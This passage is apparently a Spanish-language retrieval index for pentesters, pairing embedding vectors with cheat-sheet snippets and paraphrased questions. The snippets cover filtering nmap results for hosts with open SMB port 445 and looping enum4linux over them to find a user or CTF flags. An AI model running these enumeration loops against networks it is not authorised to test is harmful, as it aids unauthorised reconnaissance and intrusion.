0.06085, -0.06546, 0.06266, 0.03503, 0.05478, 0.02161, 0.02513, 0.01541, -0.07528, -0.03433, -0.01911, 0.05707, -0.00252, -0.08905, 0.07148, -0.00993, -0.00026, -0.06267, 0.05875, -0.06396, 0.0608, 0.00786, -0.04786, -0.01964, -0.04493, -0.03582, 0.01612, 0.04823, 0.00443, 0.01536, -0.01673, 0.03166, -0.05681, -0.04599, 0.00171, -0.00023, 0.02025, -0.10251, -0.00605, 0.01081, -0.06181, -0.02545, -0.03176, -0.00863, -0.05569, -0.00179, -0.00104, 0.00025, 0.02567, 0.01898, 0.07455, 0.04087, 0.04884, 0.01406, -0.02628, 0.01055, -0.01646, -0.01493, 0.0033, -0.06048, 0.04003, 0.03955, 0.00217, 0.0363, -0.0292, 0.04736, 0.01829, 0.00366, -0.04876, 0.00143, -0.01084, -0.0221, 0.04431, 0.01775, 0.01789, -0.00885, 0.01849, 0.00541, 0.00833, 0.00202, 0.05608, 0.02005, -0.03959, -0.02168, -0.03541, -0.005, -0.03871, -0.00062, -0.06755, -0.04044, 0.00066, -0.05786, -0.00564, 0.01217, 0.01914, 0.06333]} +{"tipo": "pregunta", "herramienta": "Bucles bash sobre IPs", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Bucles bash sobre IPs.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Filtrar resultados de nmap (greppable)\n```bash\ngrep \"445/open\" smb.txt | cut -d' ' -f2 # IPs con ese puerto\ngrep -c \"445/open\" smb.txt # cuΓ‘ntos hosts lo tienen\ngrep \"Status: Up\" scan.gnmap | cut -d' ' -f2 # hosts vivos\n```", "indexar": "con que filtro puedo extraer las direcciones IP de un puerto especΓ­fico en nmap?", "v": [0.08031, -0.0243, -0.15431, -0.17002, 0.01471, -0.09583, 0.136, -0.07781, -0.26666, -0.05918, 0.13654, 0.05949, 0.0899, -0.15615, -0.09715, -0.03393, -0.00348, 0.01186, 0.10776, -0.03926, -0.09469, 0.07343, -0.11664, -0.06791, -0.00287, 0.15227, -0.08882, 0.14721, -0.13948, -0.04992, -0.11793, 0.008, 0.04936, -0.04583, -0.03551, -0.09054, 0.09972, 0.05161, -0.00387, 0.04019, 0.05843, 0.09765, -0.09424, 0.03025, 0.07111, 0.01428, 0.02683, -0.05865, 0.01078, -0.05099, -0.07381, -0.06904, -0.09711, 0.00941, -0.17166, 0.01481, 0.00665, -0.00116, 0.03212, 0.03033, 0.01708, 0.09322, -0.06353, -0.08544, -0.03662, -0.0825, -0.04883, 0.00589, -0.12406, -0.12148, -0.05081, -0.0597, 0.1289, 0.06177, 0.04263, 0.01999, 0.06144, -0.01109, 0.02623, 0.0154, -0.01323, 0.03079, -0.08442, -0.08154, -0.08212, -0.05184, 0.00919, -0.13218, 0.02889, -0.13338, 0.06309, 0.01963, -0.06624, 0.03973, -0.02141, 0.00889, -0.04764, 0.09435, -0.04941, 0.0256, 0.08278, 0.0389, -0.08478, 0.15203, 0.08094, 0.04859, 0.03699, 0.01015, 0.06568, 0.01207, 0.03603, 0.01149, 0.00755, -0.13698, 0.00204, -0.05653, -0.0455, -0.06542, -0.00861, -0.01861, -0.05302, -0.1262, 0.00181, 0.00218, 0.02397, 0.03702, 0.0162, 0.09857, 0.0596, -0.00424, -0.01638, 0.04607, -0.04401, -0.01314, 0.00696, 0.01928, -0.01569, -0.01674, -0.03053, 0.04402, -0.03153, -0.08809, -0.03358, -0.00967, 0.0664, -0.00629, 0.00224, -0.06255, -0.05617, -0.05065, 0.06688, -0.01473, 0.02521, 0.00918, -0.07924, 0.09265, 0.04893, -0.04307, 0.0113, 0.04208, -0.01386, 0.00063, -0.01443, -0.02083, 0.07786, 0.0503, -0.12213, 0.01514, 0.07129, -0.05806, -0.04545, 0.04795, -0.03214, -0.04273, -0.01992, 0.02945, -0.00826, -0.02397, 0.02585, 0.02747, -0.02521, 0.01371, -0.01435, -0.06096, -0.0542, -0.04384, 0.00252, -0.05792, -0.03856, 0.09022, 0.04344, -0.01632, -0.03621, 0.00877, -0.00413, 0.00429, -0.01232, -0.0445, -0.03291, -0.02438, -0.01192, 0.05982, 0.01594, -0.00498, 0.00123, 0.02673, -0.06853, 0.0274, 0.00362, 0.02893, -0.02167, -0.00429, 0.03284, -0.06752, -0.08648, 0.07086, 0.03945, -0.01748, 0.028, 0.03313, -0.01927, 0.0563, 0.04751, 0.03213, -0.0178, 0.00611, 0.01041, -0.02225, 0.03594, 0.02771, -0.03017, 0.03794, -0.07247, -0.04295, 0.02481, 0.02865, -0.04125, -0.0111, -0.03729, -0.02696, 0.03824, -0.0203, 0.01041, -0.0482, -0.00475, -0.0559, -0.09612, 0.07638, -0.02095, -0.03204, -0.0451, 0.01642, 0.00866, -0.0347, 0.0185, 0.02791]} +{"tipo": "pregunta", "herramienta": "Bucles bash sobre IPs", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Bucles bash sobre IPs.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Filtrar resultados de nmap (greppable)\n```bash\ngrep \"445/open\" smb.txt | cut -d' ' -f2 # IPs con ese puerto\ngrep -c \"445/open\" smb.txt # cuΓ‘ntos hosts lo tienen\ngrep \"Status: Up\" scan.gnmap | cut -d' ' -f2 # hosts vivos\n```", "indexar": "como puedo contar cuantos hosts tienen abierto el puerto 445 en mis resultados de escaneo?", "v": [-0.06241, -0.0268, -0.15196, 0.00695, -0.0001, -0.09412, 0.09177, -0.14062, -0.18566, -0.14614, -0.17195, 0.05065, 0.06068, -0.04829, 0.04821, -0.00705, -0.01606, 0.08658, 0.13388, 0.05473, -0.1619, -0.05083, -0.06887, -0.07778, 0.07654, 0.03708, -0.05173, 0.15271, -0.07633, 0.08226, 0.00696, 0.02222, -0.01806, 0.0222, 0.08139, -0.0783, 0.05553, 0.03669, 0.03488, 0.0912, -0.0682, 0.06105, -0.09503, -0.13018, 0.12442, -0.15381, -0.11312, -0.01984, -0.04473, -0.04351, -0.03237, -0.01973, -0.02437, 0.01766, -0.0492, -0.05148, -0.00974, 0.10735, 0.0634, -0.0621, -0.07547, 0.03209, 0.04415, -0.09504, -0.04027, -0.05303, 0.04611, 0.11868, -0.08416, 0.00785, -0.06911, 0.0731, 0.0257, 0.05646, -0.05095, -0.02099, -0.01367, -0.01075, -0.04127, 0.04948, 0.01577, -0.02995, 0.01212, -0.10009, -0.10308, -0.06836, -0.00506, -0.06653, 0.05123, -0.07657, 0.02829, -0.04739, 0.05557, 0.11345, -0.06709, -0.02999, 0.08367, 0.10646, -0.00463, 0.06567, 0.04785, 0.10317, -0.1033, 0.07285, 0.00872, 0.12081, -0.02717, -0.14227, 0.00141, 0.05992, 0.02, -0.00497, -0.02107, -0.04937, -0.03031, -0.01736, -0.01796, -0.06298, 0.05753, 0.00529, -0.07621, -0.08321, 0.00485, 0.0816, -0.00681, -0.01362, 0.02361, -0.0053, 0.12424, 0.02399, 0.02608, -0.02048, -0.08411, -0.03561, -0.01217, -0.0633, 0.03291, -0.0353, 0.03588, 0.03601, -0.09926, 0.03912, -0.0041, -0.13409, 0.04308, -0.03026, -0.02796, -0.00106, -0.11362, -0.05542, 0.00208, 0.06622, -0.04284, 0.046, -0.12143, 0.04988, 0.08907, -0.06713, 0.01681, 0.07855, 0.00563, -0.01958, -0.08515, 0.04861, 0.02152, -0.0605, -0.08256, -0.01239, 0.0202, -0.05106, -0.04347, 0.10537, -0.06009, -0.07087, 0.01626, 0.0209, -0.06844, -0.03162, -0.0833, -0.02829, -0.05083, 0.02866, -0.034, -0.07157, -0.03321, -0.04071, 0.02997, -0.04026, -0.01662, 0.07696, 0.09106, 0.00072, -0.03119, -0.06866, -0.04286, 0.05146, 0.00825, -0.02284, 0.00072, -0.04385, -0.01491, 0.05267, 0.00962, -0.00653, -0.01735, 0.02006, -0.06136, 0.0465, 0.0183, 0.02819, 0.02309, -0.05234, 0.06622, -0.02217, -0.01622, 0.01871, -0.02175, -0.024, 0.05261, 0.06473, 0.00089, 0.01703, 0.02545, -0.03868, -0.00323, 0.00837, 0.04847, -0.0115, 0.08792, 0.0612, -0.05778, -0.01756, -0.03761, -0.02987, 0.00424, 0.01704, 0.02329, -0.02403, -0.01032, 0.02092, 0.06808, 0.04125, -0.00468, -0.05778, 0.0131, -0.05867, -0.02913, 0.10613, -0.03074, -0.02053, -0.06501, 0.0743, 0.01196, -0.07106, 0.01904, 0.03173]} +{"tipo": "pregunta", "herramienta": "Bucles bash sobre IPs", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Bucles bash sobre IPs.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Filtrar resultados de nmap (greppable)\n```bash\ngrep \"445/open\" smb.txt | cut -d' ' -f2 # IPs con ese puerto\ngrep -c \"445/open\" smb.txt # cuΓ‘ntos hosts lo tienen\ngrep \"Status: Up\" scan.gnmap | cut -d' ' -f2 # hosts vivos\n```", "indexar": "necesito saber cuales son los hostes vivos en mi archivo de scan, como lo hago?", "v": [0.07307, -0.11826, -0.17141, 0.09966, -0.04569, -0.11234, -0.09753, -0.12651, -0.0008, -0.15, -0.03729, -0.12282, -0.06158, 0.03788, 0.16287, 0.05214, 0.22052, -0.01198, 0.08092, 0.12371, -0.12135, 0.05901, -0.07505, 0.11132, -0.04029, -0.04847, 0.06298, 0.08268, -0.17532, 0.08948, 0.00396, -0.02214, -0.03059, 0.03837, -0.0675, 0.02893, 0.0041, -0.01074, -0.07476, 0.16802, 0.02355, 0.01698, -0.07203, 0.01269, -0.07546, -0.13603, -0.07933, -0.00726, -0.07072, 0.03309, 0.00497, -0.02523, -0.01019, 0.01624, -0.10422, -0.13898, -0.06701, -0.05215, 0.08506, 0.03014, -0.05281, 0.08308, 0.1379, 0.04175, -0.04841, -0.01353, 0.03085, 0.01794, -0.14037, -0.01518, -0.15118, 0.13039, 0.08339, 0.09028, -0.02553, -0.01255, -0.00218, -0.12535, 0.05066, 0.05946, 0.03803, -0.00848, -0.04121, 0.00249, -0.07882, -0.01989, -0.0464, 0.11569, 0.09408, -0.02216, 0.06084, -0.09152, -0.00041, 0.09135, 0.02083, -0.03864, -0.00415, 0.06506, 0.09616, 0.06118, -0.02853, -0.05032, -0.03429, 0.02688, 0.07921, 0.0551, -0.04726, -0.0364, -0.06198, 0.03463, 0.00688, 0.03628, 0.05576, -0.017, -0.02007, 0.03171, -0.0088, -0.01024, 0.05333, -0.02268, -0.08114, 0.02335, 0.09653, 0.01756, 0.03998, -0.05214, -0.01857, 0.05987, 0.0941, -0.00457, 0.01925, 0.01048, -0.03934, -0.07695, 0.03515, 0.02184, 0.05045, 0.03845, -0.00254, -0.01698, -0.04271, 0.03343, 0.00312, -0.00132, 0.05478, 0.01324, -0.11024, -0.06957, -0.09844, -0.01307, 0.00024, -0.00536, 0.03157, 0.0111, -0.06568, -0.01484, 0.05046, -0.11413, 0.05999, 0.00855, 0.02219, -0.01534, -0.00188, -0.04214, -0.01657, -0.03779, -0.08106, -0.03461, -0.01463, -0.06937, -0.01844, -0.02431, -0.08183, -0.06574, -0.02339, 0.00224, 0.02897, -0.02061, -0.0093, -0.05766, 0.00346, 0.07273, 0.00862, 0.08153, -0.0011, -0.06059, 0.09766, 0.04829, -0.01675, 0.05956, 0.08066, 0.08328, -0.06462, 0.0693, 0.02367, 0.04378, 0.00304, -0.02531, 0.01125, -0.06253, 0.01661, -0.0257, -0.00535, -0.01741, 0.07089, 0.02101, -0.04793, 0.04074, -0.01095, 0.00315, 0.03297, 0.04964, 0.0395, -0.00761, -0.045, 0.03393, 0.04086, -0.01223, 0.02341, -0.05167, 0.02632, 0.04912, 0.01506, -0.02493, 0.03864, -0.04245, 0.02952, 0.01843, 0.0657, -0.00837, 0.01335, 0.09329, -0.01898, 0.01035, 0.03374, 0.03507, 0.03027, -0.01372, -0.00516, -0.10754, 0.04236, 0.06849, -0.00647, -0.04749, 0.03679, 0.02364, -0.03545, 0.07861, -0.02282, -0.10456, -0.03671, -0.02618, 0.03076, 0.00318, 0.02635, -0.03265]} +{"tipo": "pregunta", "herramienta": "Bucles bash sobre IPs", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Bucles bash sobre IPs.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Bucle sobre IPs (anatomΓ­a)\n```bash\nfor ip in $(grep \"445/open\" smb.txt | cut -d' ' -f2); do\n echo \"=== $ip ===\"\n enum4linux -a $ip < /dev/null 2>/dev/null | grep -i alfred\ndone\n```\n- `< /dev/null` β†’ evita que se cuelgue en prompts `Password:`.\n- Si falta `done`, bash se queda en `for>` (Ctrl+C).", "indexar": "quΓ© herramienta sirve para escanear puertos SMB de forma automΓ‘tica?", "v": [0.07768, -0.08111, -0.17744, -0.11134, 0.03194, -0.17129, -0.03364, -0.23332, -0.10847, 0.01258, -0.16974, 0.07358, 0.15547, -0.14612, 0.02249, 0.0883, 0.01438, -0.16034, -0.03433, 0.13735, 0.0496, -0.04007, -0.02897, -0.0534, -0.05724, 0.00211, 0.04217, 0.04227, -0.24065, 0.07237, 0.00265, 0.13677, 0.11651, -0.05041, -0.01801, -0.14482, -0.01367, -0.00715, 0.03598, 0.0716, 0.06148, 0.01344, -0.06604, -0.07991, 0.04321, 0.01146, -0.02356, 0.07804, 0.02312, 0.07767, -0.04336, -0.04272, -0.10057, 0.04238, -0.09129, -0.09699, 0.16331, -0.05506, 0.01118, -0.13161, -0.08628, 0.09981, -0.04876, -0.05662, -0.02747, -0.03696, 0.01264, -0.00479, -0.04454, -0.0095, -0.09176, 0.00149, 0.05084, 0.0002, 0.00903, -0.02461, -0.01819, 0.12875, 0.04165, 0.06369, 0.06399, -0.06976, -0.09549, -0.03277, 0.02636, -0.05612, -0.02844, -0.02108, 0.05712, -0.13799, -0.01337, 0.01277, 0.0581, 0.12159, -0.00853, -0.03062, 0.00324, -0.01158, 0.01319, 0.01202, 0.14695, -0.06364, -0.07587, 0.10613, -0.0199, 0.02645, -0.01647, -0.05018, 0.00686, 0.04302, 0.11845, 0.07505, 0.0239, -0.02834, -0.03937, 0.03449, 0.01462, -0.07996, -0.01964, 0.02448, 0.03513, -0.01972, -0.05278, -0.06372, -0.01347, -0.01517, 0.00339, 0.08854, 0.02492, -0.02701, 0.04011, -0.07117, -0.07699, -0.03147, -0.04739, -0.06687, 0.00856, -0.1338, -0.03689, -0.09234, -0.04713, 0.07783, -0.08442, -0.06947, -0.0124, -0.02145, 0.07033, -0.03963, -0.01317, -0.0466, 0.07491, -0.01443, -0.03033, 0.03579, -0.03813, 0.04525, 0.03519, 0.00919, -0.08016, 0.07963, -0.02732, -0.04575, 0.02692, 0.04766, 0.00356, -0.05184, 0.00182, -0.01546, 0.03549, 0.02677, 0.03675, 0.064, 0.02154, -0.0841, -0.00598, -0.0277, -0.04345, -0.00719, -0.01329, -0.08445, -0.04898, 0.04964, -0.04147, -0.04056, -0.01187, -0.08361, 0.02034, -0.10973, 0.02063, 0.08586, -0.01375, 0.04588, -0.01423, -0.07274, -0.01435, 0.00819, -0.02792, -0.00921, 0.0348, -0.02352, -0.02696, 0.01538, -0.0124, -0.04834, 0.04201, 0.09193, -0.02554, 0.00601, 0.04045, 0.05882, 0.00501, 0.00051, 0.03133, -0.01457, 0.03812, -0.01859, -0.01391, 0.02877, 0.02018, 0.03611, -0.03145, 3e-05, 0.02634, 0.02315, -0.03296, 0.04424, 0.02461, 0.05575, 0.00556, -0.01027, 0.0164, 0.01759, -0.03112, -0.01596, 0.03197, -0.04056, -0.00283, -0.01945, -0.02588, -0.03646, -0.00901, -0.01259, 0.00013, -0.00972, -0.00311, -0.07356, 0.0164, -0.02244, 0.00112, -0.02081, -0.02441, 0.03103, 0.0073, -0.02743, 0.01864, -0.00901]} +{"tipo": "pregunta", "herramienta": "Bucles bash sobre IPs", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Bucles bash sobre IPs.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Bucle sobre IPs (anatomΓ­a)\n```bash\nfor ip in $(grep \"445/open\" smb.txt | cut -d' ' -f2); do\n echo \"=== $ip ===\"\n enum4linux -a $ip < /dev/null 2>/dev/null | grep -i alfred\ndone\n```\n- `< /dev/null` β†’ evita que se cuelgue en prompts `Password:`.\n- Si falta `done`, bash se queda en `for>` (Ctrl+C).", "indexar": "con quΓ© puedo realizar un bucle sobre IPs sin que me pida contraseΓ±as?", "v": [0.11414, 0.04185, -0.20162, 0.04691, 0.06012, -0.19722, 0.01322, -0.10249, -0.15126, -0.05446, 0.14454, 0.08625, -0.02423, -0.07975, -0.07882, -0.00145, -0.07838, -0.01442, 0.08487, -0.06315, 0.05596, -0.01324, -0.1049, 0.07155, -0.01153, 0.05181, 4e-05, 0.15055, -0.09335, -0.1827, -0.15068, -0.06248, 0.03047, 0.0255, -0.07923, -0.00508, 0.04216, 0.20283, -0.02671, 0.0355, -0.05075, 0.06753, -0.05764, 0.07274, 0.0364, 0.02655, 0.03583, -0.02674, 0.03613, -0.0771, -0.19358, -0.14596, -0.04691, -0.08496, -0.03276, -0.03096, 0.10427, -0.00893, 0.02369, -0.00963, -0.07252, 0.13506, 0.01514, 0.03096, -0.04607, -0.0764, 0.0311, -0.00936, -0.04676, 0.021, 0.0817, -0.05182, -0.1186, 0.05239, 0.03699, -0.01213, 0.02678, -0.02776, 0.01865, 0.08066, 0.00606, 0.06657, -0.01167, 0.0236, -0.06859, 0.04639, 0.03051, -0.18131, 0.03802, -0.06421, 0.09652, 0.04873, 0.0023, 0.02118, -0.0539, 0.03007, -0.00933, 0.09624, -0.10494, -0.06494, -0.02715, 0.10107, -0.0617, 0.13731, 0.00548, 0.08476, 0.07392, 0.01894, 0.07513, -0.06994, -0.0482, 0.05301, -0.05201, -0.06348, 0.02919, 0.01419, -0.04259, -0.04503, 0.05562, 0.01337, 0.02982, -0.08414, 0.02791, 0.02761, 0.03515, 0.09212, 0.04768, 0.10701, -0.04388, 0.00686, 0.02822, -0.01545, -0.05084, -0.04538, 0.06066, 0.04152, -0.03612, -0.11968, -0.0302, -0.00943, 0.06616, -0.09507, -0.04317, 0.01936, 0.07558, 0.01706, 0.01243, -0.07581, -0.01057, -0.04844, -0.02775, -0.0106, 0.05932, 0.07637, -0.06965, 0.03744, 0.00551, -0.1193, 0.02241, 0.10169, -0.00953, 0.01314, -0.02091, -0.0146, -0.02414, -0.00812, -0.07385, 0.03662, 0.02999, 0.01899, -0.01607, 0.00117, -0.05764, -0.05474, 0.00169, -0.00795, -0.05494, -0.05986, 0.04551, -0.07962, -0.04675, -0.02736, -0.00321, -0.00768, 0.02023, -0.03971, 0.07285, 0.02842, -0.03305, 0.0346, 0.05741, -0.0285, 0.015, 0.02694, -0.01592, -0.07152, -0.02305, -0.0642, -0.04626, -0.06832, -0.0, -0.01082, -0.01284, -0.01995, 0.01896, 0.02467, -0.09032, -0.02302, -0.00517, 0.00323, 0.03727, -0.02001, 0.05612, -0.09693, -0.06119, -0.00117, 0.00716, 0.03753, -0.01862, -0.01522, 0.04168, 0.03008, -0.01091, 0.03925, -0.02807, 0.01792, -0.0328, 0.02626, 0.05126, 0.0094, -0.03961, 0.0202, -0.06435, 0.02012, 0.07307, 0.02081, -0.07077, -0.05893, 0.00812, -0.02776, -0.01948, 0.03364, 0.02233, -0.07, -0.02383, -0.0526, -0.0725, 0.03817, -0.0135, -0.02024, -0.07418, 0.02797, 0.02714, -0.00908, -0.00915, 0.00019]} +{"tipo": "pregunta", "herramienta": "Bucles bash sobre IPs", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Bucles bash sobre IPs.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Bucle sobre IPs (anatomΓ­a)\n```bash\nfor ip in $(grep \"445/open\" smb.txt | cut -d' ' -f2); do\n echo \"=== $ip ===\"\n enum4linux -a $ip < /dev/null 2>/dev/null | grep -i alfred\ndone\n```\n- `< /dev/null` β†’ evita que se cuelgue en prompts `Password:`.\n- Si falta `done`, bash se queda en `for>` (Ctrl+C).", "indexar": "necesito una alternativa libre a enum4linux, ΒΏcΓ³mo funciona?", "v": [-0.14298, 0.07254, -0.11909, 0.06076, 0.03942, -0.13521, -0.18073, -0.04583, -0.10258, -0.11063, -0.11648, -0.27134, -0.02473, 0.05339, 0.04024, -0.15911, -0.02742, -0.14813, 0.02337, 0.01729, -0.05106, -0.08116, -0.16606, -0.15587, -0.04853, 0.01291, 0.08635, -0.01728, -0.05518, 0.01856, 0.04276, -0.06655, 0.18272, -0.04772, -0.01893, 0.05179, 0.12438, -0.01925, 0.14829, 0.09064, 0.05738, 0.06201, -0.09651, 0.08247, -0.03631, -0.01139, -0.0987, -0.05826, -0.08605, 0.1186, -0.1046, -0.003, -0.00077, -0.0549, 0.00414, -0.00251, 0.10484, -0.05434, -0.06606, -0.08533, -0.05076, -0.10947, 0.03181, 0.01808, 0.02212, -0.04805, -0.08148, 0.01038, 0.01923, 0.09935, -0.03411, 0.03665, -0.04563, -0.00827, -0.08649, 0.03436, 0.00711, -0.12635, -0.04837, 0.08368, 0.17684, 0.06795, 0.05756, 0.01219, -0.04259, -0.01159, 0.09886, -0.03976, -0.05774, 0.03168, 0.05515, 0.04869, 0.06582, 0.066, -0.03254, -0.08212, -0.04332, 0.0629, 0.00361, 0.0517, 0.03072, 0.01644, -0.02825, 0.02456, -0.00713, -0.06408, 0.06775, 0.00877, -0.08577, 0.00568, 0.00147, -0.01534, -0.05282, 0.02902, -0.02408, -0.04222, -0.03156, 0.00598, -0.02251, 0.05864, -0.07274, 0.06846, 0.01048, -0.10061, 0.03368, 0.01322, 0.09669, 0.0432, 0.05851, 0.07353, 0.05148, -0.04034, -0.04928, -0.06604, -0.10093, -0.02434, 0.10467, -0.0185, -0.02268, -0.01021, 0.04178, -0.05537, -0.00443, -0.0516, 0.00693, -0.03189, 0.03807, 0.01351, 0.0245, -0.03243, 0.07702, -0.05529, 0.02845, 0.08632, -0.03973, -0.03976, 0.03428, -0.03744, -0.11012, 0.01479, 0.05793, -0.0087, 0.0015, 0.01078, -0.03257, -0.00821, -0.01047, -0.02169, -0.08316, 0.06696, 0.00844, 0.04992, 0.07989, -0.119, 0.02995, -0.06156, -0.06367, -0.02345, 0.00346, -0.00305, 0.02285, 0.02982, -0.04974, -0.03943, 0.01733, 0.00731, 0.00104, 0.00506, 0.00059, 0.08193, 0.02671, -0.03592, -0.04336, -0.08475, -0.00704, 0.04331, 0.03352, -0.09318, 0.00427, 0.00743, 0.0151, -0.01309, 0.02871, -0.02866, -0.0204, -0.00953, -0.05862, 0.07436, 0.00514, 0.05713, 0.02024, 0.02138, 0.06606, 0.05169, -0.05556, 0.02101, 0.04087, 0.02372, -0.03512, -0.01948, 0.01886, -0.00523, -0.02101, 0.0007, 0.01512, 0.01062, 0.02215, -0.0222, 0.01527, 0.02135, 0.03625, 0.03239, -0.00377, 0.04877, 0.01652, -0.04624, -0.05307, -0.00683, 0.02153, 0.02419, 0.0782, 0.05856, -0.03624, 0.02573, -0.04219, 0.00394, -0.0702, 0.01085, -0.02717, 0.00168, -0.02134, 0.00116, 0.02223, 0.06601, 0.02965, 0.0722]} +{"tipo": "pregunta", "herramienta": "Bucles bash sobre IPs", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Bucles bash sobre IPs.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Enumerar SMB de todos y luego grep\n```bash\nfor ip in $(grep \"445/open\" smb.txt | cut -d' ' -f2); do enum4linux -a $ip < /dev/null > enum_$ip.txt 2>&1; done\ngrep -l \"alfred\" enum_*.txt # en QUΓ‰ host estΓ‘ el usuario\ngrep -iE 'remark|flag|OS\\{' enum_HOST.txt # flag en comentarios de shares\n```", "indexar": "que programa puedo usar para enumerar todos los servidores SMB y buscar usuarios alfa", "v": [-0.09027, -0.04981, -0.18159, -0.2052, -0.06078, -0.05967, -0.05805, -0.20598, -0.15773, -0.04545, -0.1777, -0.04554, 0.06935, -0.11887, 0.09115, -0.01959, 0.04327, -0.13966, 0.04423, 0.12893, 0.13445, 0.05309, -0.05568, -0.04828, -0.12655, 0.04859, 0.02269, -0.07916, 0.04906, -0.01112, 0.04574, -0.05379, 0.07962, -0.0845, 0.00654, 0.02069, 0.01204, 0.00397, -0.00061, 0.15024, 0.09023, 0.10811, -0.12398, -0.12206, 0.01285, 0.07013, -0.01243, -0.04544, -0.03729, -0.04429, -0.10749, -0.06145, -0.05788, -0.0388, -0.08565, -0.13185, 0.06781, -0.14298, -0.01751, -0.0208, -0.14808, -0.0045, 0.00057, -0.00359, 0.04235, -0.03281, 0.0868, 0.00678, -0.13683, 0.02023, -0.08879, 0.03644, -0.00298, -0.10662, 0.0045, 0.07734, -0.0378, -0.02146, 0.08853, -0.0149, -0.0684, -0.05582, 0.00314, 0.01914, -0.114, -0.03105, 0.07949, -0.01893, 0.00027, 0.02794, 0.03024, 0.13249, 0.01154, 0.09617, 0.00535, -0.03, 0.10788, -0.0226, 0.09104, 0.05102, 0.08049, -0.01142, -0.04509, 0.15262, -0.07411, 0.05397, 0.11113, -0.06565, 0.00878, -0.05345, 0.05248, -0.10545, -0.04814, -0.03, -0.07794, -0.05736, -0.05235, -0.10004, 0.00452, -0.01682, -0.03839, 0.03692, -0.01241, -0.00404, 0.12231, -0.01278, 0.05795, 0.02538, -0.04982, -0.05036, -0.00213, 0.01285, -0.05062, -0.02175, -0.10231, -0.02994, 0.01356, -0.00514, 0.03025, 0.01712, -0.01731, 0.06805, -0.06915, 0.01245, 0.03922, -0.05276, 0.05017, -0.08505, -0.04953, -0.01951, 0.02608, -0.02263, -0.05225, -0.00043, -0.05895, -0.0159, 0.04125, -0.02312, -0.08663, -0.01355, -0.01905, -0.02302, 0.0003, 0.04638, 0.04681, -0.02522, 0.01971, 0.02017, 0.03785, 0.00958, -0.00572, 0.06426, 0.05911, -0.12424, -0.00084, -0.02685, -0.03047, -0.01039, 0.05182, 0.02245, -0.01715, 0.01547, 0.02012, 0.0272, -0.07171, -0.06337, -0.01693, 0.00867, -0.01944, -0.05974, -0.01888, 0.07702, 0.0111, 0.0249, 0.01508, -0.02399, -0.00369, 0.04442, 0.0045, -0.10334, -0.02909, 0.01425, -0.0722, -0.02375, 0.02985, 0.0026, -0.01371, 0.01533, 0.07119, 0.0663, 0.01263, -0.03461, 0.06111, -0.00592, -0.02108, -0.05989, 0.03736, 0.01117, 0.04245, -0.0281, -0.01458, 0.04858, -0.00148, 0.10151, -0.00798, -0.02895, -0.01071, -0.02536, -0.00816, 0.00248, -0.01278, 0.01319, 0.00661, -0.02828, -0.01314, -0.04486, -0.00426, -0.01158, -0.00365, -0.06751, -0.04972, 0.07523, -0.02588, 0.00702, -0.045, -0.04946, -0.05474, -0.0363, -0.03619, 0.00127, 0.03151, 0.02242, 0.03686, -0.03598, -0.00289, 0.03042]} +{"tipo": "pregunta", "herramienta": "Bucles bash sobre IPs", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Bucles bash sobre IPs.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Enumerar SMB de todos y luego grep\n```bash\nfor ip in $(grep \"445/open\" smb.txt | cut -d' ' -f2); do enum4linux -a $ip < /dev/null > enum_$ip.txt 2>&1; done\ngrep -l \"alfred\" enum_*.txt # en QUΓ‰ host estΓ‘ el usuario\ngrep -iE 'remark|flag|OS\\{' enum_HOST.txt # flag en comentarios de shares\n```", "indexar": "con quΓ© herramienta busco un banderΓ­n o una bandera oculta dentro del contenido de compartimentos compartidos", "v": [-0.00401, -0.08658, -0.11713, -0.06994, -0.07862, -0.04439, -0.03633, -0.12159, -0.05426, -0.22086, -0.05901, -0.01446, -0.04119, 0.01136, 0.00957, 0.09831, -0.0542, 0.05793, 0.11829, -0.09306, -0.03622, -0.00955, -0.0222, 0.03554, 0.00404, -0.19831, -0.01717, 0.02034, -0.12098, 0.10248, 0.03085, 0.01042, 0.08524, 0.07031, -0.06388, -0.17039, -0.06194, 0.074, 0.02691, -0.03231, -0.06828, 0.08263, -0.0866, -0.01941, -0.07313, 0.02221, -0.01577, 0.11291, 0.09733, 0.04545, -0.06356, -0.12955, -0.12556, -0.06568, -0.01274, -0.18972, 0.1972, -0.08127, 0.01609, -0.03712, -0.01162, 0.02602, 0.02415, 0.0091, -0.06757, -0.06284, -0.03222, 0.07497, 0.06066, 0.05086, 0.01252, 0.06365, 0.01704, -0.10722, -0.06365, 0.08903, -0.05658, 0.01901, -0.00616, 0.09316, 0.06855, -0.02438, -0.01223, 0.05419, 0.02699, -0.11656, 0.0025, 0.01422, -0.01035, -0.16003, 0.03664, 0.07178, -0.0889, -0.0157, -0.0308, 0.00996, 0.03197, 0.01204, -0.03046, -0.00671, 0.16595, 0.01383, -0.10961, 8e-05, 0.06624, 0.02757, -0.1583, -0.06273, -0.01583, 0.05905, 0.09875, -0.01881, 0.00665, -0.03245, -0.00148, -0.03584, 0.0207, -0.02411, 0.02688, -0.10086, -0.03792, 0.10876, 0.02441, -0.03618, 0.11383, -0.09203, -0.08631, 0.10983, 0.00693, -0.06148, -0.1041, -0.01871, -0.00935, 0.04589, -0.09789, -0.01117, -0.03195, -0.10248, 0.04752, -0.00715, 0.05217, -0.02645, -0.01304, -0.05554, 0.03173, 0.08598, 0.04868, 0.01877, -0.01846, 0.0246, -0.03831, -0.0051, 0.00315, -0.05057, 0.00853, 0.06683, 0.06132, -0.09928, -0.11258, -0.0783, -0.05322, -0.02584, -0.04765, 0.05236, -0.01284, -0.03936, -0.01055, 0.00609, 0.03862, 0.01508, 0.00913, 0.02229, 0.01161, -0.02422, 